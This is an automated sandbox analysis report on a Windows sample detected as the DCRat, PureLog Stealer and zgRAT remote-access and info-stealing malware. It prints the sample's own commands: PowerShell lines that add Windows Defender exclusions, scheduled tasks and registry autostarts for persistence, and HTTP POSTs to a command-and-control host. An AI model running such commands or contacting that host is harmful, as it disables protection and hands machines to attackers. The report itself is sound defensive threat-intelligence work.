Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UuIspZT5b6.exe

Overview

General Information

Sample name:UuIspZT5b6.exe
renamed because original name is a hash value
Original sample name:64483e064aa921f94d5b254601db7c97.exe
Analysis ID:1485769
MD5:64483e064aa921f94d5b254601db7c97
SHA1:7bcee1f1f12c6cf5707b99f093e639f13ff77338
SHA256:c5f0a463fdc02fa0a127a4547bb1dcaf06c679a08c0c9e3452b64ac4101ca50d
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • UuIspZT5b6.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\UuIspZT5b6.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
    • csc.exe (PID: 6152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "UuIspZT5b6U" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\UuIspZT5b6.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 6752 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7204 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 7572 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7796 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7916 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • dllhost.exe (PID: 7288 cmdline: "C:\Recovery\dllhost.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 7120 cmdline: C:\Recovery\dllhost.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 6420 cmdline: C:\Recovery\dllhost.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • Idle.exe (PID: 7740 cmdline: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • Idle.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • TyCvtMoTOGrwUAEyotiaCQmKvM.exe (PID: 7860 cmdline: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • TyCvtMoTOGrwUAEyotiaCQmKvM.exe (PID: 7868 cmdline: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • UuIspZT5b6.exe (PID: 7900 cmdline: C:\Users\user\Desktop\UuIspZT5b6.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • UuIspZT5b6.exe (PID: 7908 cmdline: C:\Users\user\Desktop\UuIspZT5b6.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 6296 cmdline: "C:\Recovery\dllhost.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • TyCvtMoTOGrwUAEyotiaCQmKvM.exe (PID: 7024 cmdline: "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • Idle.exe (PID: 7916 cmdline: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • UuIspZT5b6.exe (PID: 1888 cmdline: "C:\Users\user\Desktop\UuIspZT5b6.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 4192 cmdline: "C:\Recovery\dllhost.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
UuIspZT5b6.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    UuIspZT5b6.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: UuIspZT5b6.exe PID: 6996JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.UuIspZT5b6.exe.ca0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.0.UuIspZT5b6.exe.ca0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetFilename: C:\Recovery\dllhost.exe
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TyCvtMoTOGrwUAEyotiaCQmKvM
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', ProcessId: 6752, ProcessName: powershell.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\dllhost.exe, CommandLine: C:\Recovery\dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dllhost.exe, NewProcessName: C:\Recovery\dllhost.exe, OriginalFileName: C:\Recovery\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\dllhost.exe, ProcessId: 7120, ProcessName: dllhost.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\dllhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost
                          Sigma detected: CurrentVersion NT Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\dllhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                          Sigma detected: Dllhost Internet Connection
                          Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 172.67.203.2, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Recovery\dllhost.exe, Initiated: true, ProcessId: 7288, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", ProcessId: 6152, ProcessName: csc.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', ProcessId: 6752, ProcessName: powershell.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f, ProcessId: 6752, ProcessName: schtasks.exe
                          Sigma detected: Dynamic CSharp Compile Artefact
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetFilename: C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', ProcessId: 6752, ProcessName: powershell.exe

                          Data Obfuscation

                          barindex
                          Sigma detected: Dot net compiler compiles file from suspicious location
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", ProcessId: 6152, ProcessName: csc.exe

                          Snort Signatures

                          No Snort rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: UuIspZT5b6.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\WkrLeKmp.logAvira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
                          Source: C:\Recovery\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\MQZNFpoe.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeReversingLabs: Detection: 68%
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeVirustotal: Detection: 54%Perma Link
                          Source: C:\Recovery\dllhost.exeReversingLabs: Detection: 68%
                          Source: C:\Recovery\dllhost.exeVirustotal: Detection: 54%Perma Link
                          Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeReversingLabs: Detection: 68%
                          Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeVirustotal: Detection: 54%Perma Link
                          Source: C:\Users\user\Desktop\CcvWVetw.logVirustotal: Detection: 7%Perma Link
                          Source: C:\Users\user\Desktop\CkfpANUC.logVirustotal: Detection: 28%Perma Link
                          Source: C:\Users\user\Desktop\MQZNFpoe.logVirustotal: Detection: 21%Perma Link
                          Source: C:\Users\user\Desktop\UZVKerGo.logVirustotal: Detection: 10%Perma Link
                          Source: C:\Users\user\Desktop\WkrLeKmp.logReversingLabs: Detection: 45%
                          Source: C:\Users\user\Desktop\WkrLeKmp.logVirustotal: Detection: 41%Perma Link
                          Source: C:\Users\user\Desktop\gSKbOmrW.logVirustotal: Detection: 7%Perma Link
                          Source: C:\Users\user\Desktop\lVerBrOi.logVirustotal: Detection: 10%Perma Link
                          Source: C:\Users\user\Desktop\pfMyjKNB.logVirustotal: Detection: 28%Perma Link
                          Source: C:\Users\user\Desktop\tznhlkeP.logReversingLabs: Detection: 45%
                          Source: C:\Users\user\Desktop\tznhlkeP.logVirustotal: Detection: 41%Perma Link
                          Source: C:\Users\user\Desktop\yfmgiIMl.logVirustotal: Detection: 21%Perma Link
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeReversingLabs: Detection: 68%
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeVirustotal: Detection: 54%Perma Link
                          Source: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exeReversingLabs: Detection: 68%
                          Source: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exeVirustotal: Detection: 54%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: UuIspZT5b6.exeReversingLabs: Detection: 68%
                          Source: UuIspZT5b6.exeVirustotal: Detection: 54%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJoe Sandbox ML: detected
                          Source: C:\Recovery\dllhost.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\UZVKerGo.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\gSKbOmrW.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\CcvWVetw.logJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: UuIspZT5b6.exeJoe Sandbox ML: detected
                          Source: UuIspZT5b6.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDirectory created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDirectory created: C:\Program Files\Mozilla Firefox\defaults\pref\6ccacd8608530fJump to behavior
                          Source: UuIspZT5b6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.pdb source: UuIspZT5b6.exe, 00000000.00000002.1812160907.000000000398D000.00000004.00000800.00020000.00000000.sdmp

                          Spreading

                          barindex
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                          Networking

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Recovery\dllhost.exeNetwork Connect: 172.67.203.2 80
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
